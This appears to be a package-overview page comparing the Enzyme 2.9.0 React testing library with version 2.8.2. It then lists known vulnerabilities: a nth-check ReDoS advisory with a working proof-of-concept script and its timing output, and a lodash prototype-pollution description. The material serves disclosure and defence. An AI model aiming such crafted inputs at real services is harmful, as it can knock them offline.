Enzyme 2.9.0 marks an incremental improvement over version 2.8.2, offering developers refined tools for testing React components. A key difference lies in the updated dependencies, reflecting a commitment to staying current with the broader JavaScript ecosystem. Specifically, newer versions of lodash (4.17.4 vs 4.17.2) prop-types (15.5.10 vs 15.5.4 )object.entries (1.0.4 vs 1.0.3), object.values (1.0.4 vs 1.0.3) and uuid (v3 vs v2) are integrated, potentially bringing performance enhancements and bug fixes from those underlying libraries.
The core functionality of Enzyme remains consistent, ensuring a smooth upgrade for existing users. Developers familiar with Enzyme's shallow rendering, full DOM rendering, and static rendering capabilities will find the transition straightforward. The peer dependency on React remains the same, supporting React versions 0.13.x through 15.x, providing flexibility for projects with varying React versions.
Notable changes also appear in the devDependencies, with upgrades to babel-eslint, babel-preset-airbnb, chai, coveralls, eslint-config-airbnb, eslint-plugin-import, eslint-plugin-jsx-a11y, eslint-plugin-react, mocha, and sinon. These updates suggest improvements in the development workflow, potentially offering better linting rules, improved test performance, and enhanced debugging capabilities. While not impacting the runtime behavior of Enzyme itself, these updates contribute to a better developer experience when writing and maintaining tests for React components.
The upgrade to the latest versions of dependencies is especially crucial for developers that care about security, performance, and better debugging, and it is crucial to stay updated with the npm packages that a project has installed.
All the vulnerabilities related to the version 2.9.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.